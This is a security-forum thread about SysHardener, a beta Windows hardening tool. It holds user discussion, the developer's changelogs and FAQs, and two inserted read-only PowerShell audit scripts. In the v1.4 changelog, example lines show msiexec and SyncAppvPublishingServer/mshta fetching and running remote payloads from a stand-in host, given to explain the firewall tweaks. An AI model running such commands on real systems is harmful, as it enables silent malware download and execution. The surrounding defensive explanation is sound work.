NVT SysHardener: Harden Windows Settings

Azure

If you view yourself as a very novice user, then it might be for the best to wait until this software implements a backup of your current settings. That way you should be able to fix any issue relatively quickly.

Some users have complained that certain things don't work right for them, after applying the recommended settings. So it's hard to say.
I kinda view this software as beta. So, I can see some people having issues with it.
 
plat1098

Thread author
Would SysHardener be OK for the "novice" user or best left to those who are more familiar with it?

I'm a novice user of this software--what is pretty necessary is an image or restore point in case something goes "awry." Or wait for a more finished, refined version. :)
 

AMD1

Some users have complained that certain things don't work right for them, after applying the recommended settings. So it's hard to say.

Well I know it's a Beta version so it's likely there will be things needing a fix but coupled with a novice user I think I might wait until it becomes a stable release and then may give it a go.
 

AMD1

I'm a novice user of this software--what is pretty necessary is an image or restore point in case something goes "awry." Or wait for a more finished, refined version. :)

Yes, I think I will wait until there is a rollback feature or something.

Having said that, I do have EXE Radar Pro v4 Beta on the go and getting the hang of that but I suppose you can simply delete any process rule and it has no adverse effect.
 

shmu26

In my opinion, OSArmor gives you more protection and less anguish. Because with OSArmor, if something gets blocked, it is usually very easy to unblock it. And at the very worst, you just uninstall it, and wave goodbye, and it's gone. It doesn't make any changes to system settings.

SysHardener is unnecessary if you use OSA.
 

AMD1

In my opinion, OSArmor gives you more protection and less anguish. Because with OSArmor, if something gets blocked, it is usually very easy to unblock it. And at the very worst, you just uninstall it, and wave goodbye, and it's gone. It doesn't make any changes to system settings.

SysHardener is unnecessary if you use OSA.

OSArmor instead of EXE Radar Pro V4 ?
 

shmu26

Level 3 - who gave me that. I think I should be relegated to level 1 !
The "levels" are all about how many posts you make. There could be quiet geniuses who have a low level, and big-mouthed dummies who have a high level.
 

shmu26

OSArmor instead of EXE Radar Pro V4 ?
Yes!
ERP 4 is not ready yet, and even when it is, the target audience is advanced users.
OSA is already working very well, and is appropriate for all members of this forum.
 

AMD1

Yes!
ERP 4 is not ready yet, and even when it is, the target audience is advanced users.
OSA is already working very well, and is appropriate for all members of this forum.

I will export my rules on ERP 4 and have a go with OSArmor. The reason I went for ERP 4 was because I have a paid license for V3.
 
Deleted member 178

Thread author
Hi, Would SysHardener be OK for the "novice" user or best left to those who are more familiar with it?
If you are able to relate an issue to SH then yes you can use it, if not don't even try because there are no alerts, no popups, so you won't know what is causing what on your system.
At its current state, SH is mostly for advanced users who know what the options do.
 

shmu26

I will export my rules on ERP 4 and have a go with OSArmor. The reason I went for ERP 4 was because I have a paid license for V3
1 If you can handle ERP, you should not call yourself a novice!
2 Some users say that ERP 4 is not protecting properly yet, and others say that it is not making rules properly yet.
3 At this point, if you are inclined towards ERP, the best protection is OSA + ERP 3 beta.
You could use ERP 3 stable, but then you need to build your own vulnerable processes list. If you are using OSA at max settings, you don't need to add very much. The most important process missing from OSA is rundll32 (system32 and syswow64).
 

NoVirusThanks

From NoVirusThanks
Developer
Released SysHardener v1.3:
Harden Windows Settings with SysHardener | NoVirusThanks

Changelog:

+ New option "Disable Loading of DLLs via AppInit_DLLs"
+ New option "Load Only Digitally Signed DLLs via AppInit_DLLs"
+ New option "Disable Windows Subsystem for Linux"
+ Improved "Disable PowerShell v2.0 Engine"
+ Added more "blue" icons that can be clicked to get more info
+ Some "orange" icons can be clicked to get more info
+ Reduced height of the main application window
+ Main application window is sizeable and can be maximized
+ Added "Tweaks" option on top main menu to "select all\suggested tweaks\unselect all" tweaks
+ Minor fixes and optimizations
+ Updated help file

Here is a screenshot:

syshardener.png


New text on the help (faqs) file:

Q - When I uninstall SysHardener, are all applied tweaks restored to their defaults?

A - No, when you uninstall SysHardener it doesn't apply or restore any tweak. It just removes SysHardener's installation files from your system.

Q - When I check "Disable Loading of DLLs via AppInit_DLLs" tweak and then I click "Restore Defaults", LoadAppInit_DLLs is still disabled?

A - Yes, if you have Secure Boot enabled, by default the OS disables LoadAppInit_DLLs, read more here:

The AppInit_DLLs mechanism is disabled by default when secure boot is enabled
AppInit DLLs and Secure Boot (Windows)

So SysHardener will keep LoadAppInit_DLLs disabled (factory-setting value) when you click "Restore Selected" button.

If you really need to enable LoadAppInit_DLLs browse with Regedit to:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
Then set the value of LoadAppInit_DLLs to 1 (DWORD)

Reboot the PC.

Q - When I check "Disable Windows Subsystem for Linux" tweak and then I click "Restore Defaults", "Windows Subsystem for Linux" is still disabled?

A - Yes, even if you click "Restore Defaults" with "Disable Windows Subsystem for Linux" checked, SysHardener will keep it disabled.

To install it just follow these instructions:

How to Install and Use the Linux Bash Shell on Windows 10

However, keep in mind it can be dangerous to have it enabled:

Bashware: Malware Can Abuse Windows 10's Linux Shell to Bypass Security Software

Here is what is on the todo list:

- Create a backup of the user's current "setup" before it applies the changes.
- Check for updates option from within the software

Some FAQs:

I see there is a confusion about how to restore settings, I'll try to reply to a few questions:

Q - How to restore settings?

A - Select only the tweaks you want to reset\restore to their defaults and then click "Restore Selected"

Q - When I uninstall SysHardener, are all tweaks restored to their defaults?

A - No, SysHardener just removes its files from your system once it is uninstalled.

Q - If I want to restore all pre-selected (suggested) tweaks to their defaults, what can I do?

A - On the top main menu "Tweaks" select "Suggested Tweaks" to select\check all suggested (pre-selected) tweaks. Then click the button "Restore Selected" to restore the selected tweaks to their factory-settings values.

Basically, the button "Restore Selected" allows you to only reset\restore the selected (checked) tweaks, not all of them.
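
The AppInit_DLLs state that the FAQ above describes can be checked without changing anything. The following PowerShell is an added example, not part of the original post or of SysHardener; it assumes the standard Windows value names AppInit_DLLs and RequireSignedAppInit_DLLs and the Wow6432Node view of the same key, none of which the post mentions.

```powershell
# Added example (not SysHardener code): read-only audit of AppInit_DLLs.
# First key path and LoadAppInit_DLLs are from the FAQ; the Wow6432Node view,
# AppInit_DLLs and RequireSignedAppInit_DLLs are assumed standard Windows names.
$keys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows'
)

function Get-SecureBootState {
    # Confirm-SecureBootUEFI needs elevation and throws on legacy BIOS systems.
    try {
        if (Confirm-SecureBootUEFI -ErrorAction Stop) { 'Enabled' } else { 'Disabled' }
    } catch {
        "Unknown ($($_.Exception.Message))"
    }
}

function Get-AppInitState {
    param([string[]]$Path)
    foreach ($p in $Path) {
        if (-not (Test-Path -LiteralPath $p)) { continue }  # no Wow6432Node on 32-bit Windows
        $v = Get-ItemProperty -LiteralPath $p
        # AppInit_DLLs is a single string, space- or comma-delimited.
        $dlls = @("$($v.AppInit_DLLs)" -split '[ ,]+' | Where-Object { $_ })
        $load = [bool]$v.LoadAppInit_DLLs
        $signed = [bool]$v.RequireSignedAppInit_DLLs
        $finding = if (-not $load) {
            'OK: loading disabled'
        } elseif ($dlls.Count -eq 0) {
            'Review: loading enabled, no DLLs listed'
        } elseif ($signed) {
            'Review: loading enabled, signed DLLs only'
        } else {
            'Warning: loading enabled, unsigned DLLs accepted'
        }
        [pscustomobject]@{
            Key = $p; LoadAppInit = $load; RequireSigned = $signed
            Dlls = $dlls -join '; '; Finding = $finding
        }
    }
}

"Secure Boot: $(Get-SecureBootState)"
Get-AppInitState -Path $keys | Format-List
```

Run it from an elevated prompt before and after applying or restoring the tweak, so the Secure Boot default described in the FAQ can be told apart from a value the tool wrote.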
 

NoVirusThanks

From NoVirusThanks
Developer
Released SysHardener v1.4:
Harden Windows Settings with SysHardener | NoVirusThanks

Here is the changelog:

+ New option "Block Outbound Connections for SyncAppvPublishing.exe" (checked)
+ New option "Block Outbound Connections for Certutil.exe" (checked)
+ New option "Block Outbound Connections for Msiexec.exe" (unchecked)
+ New option "Block Outbound Connections for Odbcconf.exe" (checked)
+ New option "Block Outbound Connections for AtBroker.exe" (checked)
+ "Block Outbound Connections for Csrss.exe" is checked
+ Added button "Windows Updates" on "System Tools" tab
+ Move progress bar after asking-for\creating restore point
+ Updated help file

Just a quick update to mitigate:

CertUtil.exe Could Allow Attackers To Download Malware While Bypassing AV
* Tweak: "Block Outbound Connections for Certutil.exe"

Msiexec.exe could allow attackers to download and execute a remote payload
Example: cmd.exe /c msiexec /q /I "hxxp://127.0.0.1/payload.msi"
* Tweak: "Block Outbound Connections for Msiexec.exe"

SyncAppvPublishing.exe could allow attackers to download and execute a remote payload
Example: SyncAppvPublishingServer.exe ".; *DownloadFile() or DownloadString() or Start-Process mshta.exe hxxp://127.0.0.1/payload.hta"
* Tweak: "Block Outbound Connections for SyncAppvPublishingServer.exe"
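
Whether the outbound-block tweaks listed above are actually in force can be confirmed from the Windows Firewall rule store. This PowerShell is an added example, not SysHardener's own code; it assumes the tweaks are implemented as per-program outbound block rules in the local policy store, which the post does not state.

```powershell
# Added example (not SysHardener code): report which of the binaries named in
# the v1.4 changelog are covered by an enabled outbound block rule.
# Assumption: the rules are per-program rules in the local (persistent) store.
$names = 'SyncAppvPublishingServer.exe', 'Certutil.exe', 'Msiexec.exe',
         'Odbcconf.exe', 'AtBroker.exe', 'Csrss.exe'

function Get-OutboundBlockCoverage {
    param([string[]]$Name)
    # Program paths of all enabled outbound block rules, with %vars% expanded.
    $blocked = Get-NetFirewallRule -Direction Outbound -Action Block -Enabled True |
        Get-NetFirewallApplicationFilter |
        Where-Object { $_.Program -and $_.Program -ne 'Any' } |
        ForEach-Object {
            [Environment]::ExpandEnvironmentVariables($_.Program).ToLowerInvariant()
        }
    foreach ($n in $Name) {
        # A 64-bit system has two copies of most of these tools; check both.
        foreach ($dir in 'System32', 'SysWOW64') {
            $path = Join-Path $env:SystemRoot "$dir\$n"
            if (-not (Test-Path -LiteralPath $path)) { continue }
            [pscustomobject]@{
                Program = $path
                Blocked = $blocked -contains $path.ToLowerInvariant()
            }
        }
    }
}

# A block rule only matters if the firewall is on for the active profile.
Get-NetFirewallProfile | Select-Object Name, Enabled | Format-Table -AutoSize
Get-OutboundBlockCoverage -Name $names | Sort-Object Blocked, Program |
    Format-Table -AutoSize
```

Entries with Blocked = False after the tweak has been applied point to a copy of the binary that no rule covers, or to a tweak left unchecked (Msiexec.exe is unchecked by default in the changelog).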
 

NoVirusThanks

From NoVirusThanks
Developer
Released SysHardener v1.5:
Harden Windows Settings with SysHardener | NoVirusThanks

Here is the changelog:

+ Updated Help\FAQs file
+ Added new command-line parameter: /customsettings "C:\Path\To\Settings.ini"
+ Removed button "Un\Select All" -> Use the "Tweaks" menu in the top main menu
+ Added option "Save to .INI file" on "Tweaks" main menu
+ Added option "Load from .INI file" on "Tweaks" main menu
+ New option Block Outbound Connections for Cmstp.exe (checked)
+ New option Block Outbound Connections for Esentutl.exe (checked)
+ New option Block Outbound Connections for Extrac32.exe (checked)
+ New option Block Outbound Connections for Expand.exe (unchecked)
+ New option Block Outbound Connections for Makecab.exe (checked)
+ New option Block Outbound Connections for Pcalua.exe (checked)
+ New option Block Outbound Connections for Print.exe (unchecked)
+ New option Block Outbound Connections for Replace.exe (unchecked)
+ New option Block Outbound Connections for ScriptRunner.exe (checked)
+ New option Block Outbound Connections for Scrcons.exe (checked)
+ New option Block Outbound Connections for Ftp.exe (unchecked)
+ New option Block Outbound Connections for Tftp.exe (unchecked)
+ New option Block Outbound Connections for Telnet.exe (unchecked)
+ Improved detection of Acrobat Reader 11.0

Screenshot of the "Save to .INI file" and "Load from .INI file" options:

syshardener15.png
 

shmu26

Released SysHardener v1.5:
Harden Windows Settings with SysHardener | NoVirusThanks
Thanks, Andreas!
 

oldschool

Released SysHardener v1.3:
Harden Windows Settings with SysHardener | NoVirusThanks
I appreciate this post but it is still a bit confusing, or I am misunderstanding it. I am not having any issues using the app with "Suggested Tweaks" applied but, IF I wanted to uninstall the app the instructions are not clear. As a feature update, could you please make in settings a "Restore MS Defaults" option? Also, if you are saying here that complete uninstallation is impossible it would be nice to alert users to this and users could decide beforehand IF they want to install this very nice app in the first place. I think this would clarify things for all users, esp. less advanced users.
 

CyberTech

UpFQIit.jpg

This is ShareX like screenshot program. OK, well, it was working fine 2 days ago or so. Yesterday I clicked some checkbox list, I don't remember which one. I'm sure it's SysHardener because I did wrong :/ . I don't want restore selected but I really need to know which one is that? You guys know this?
 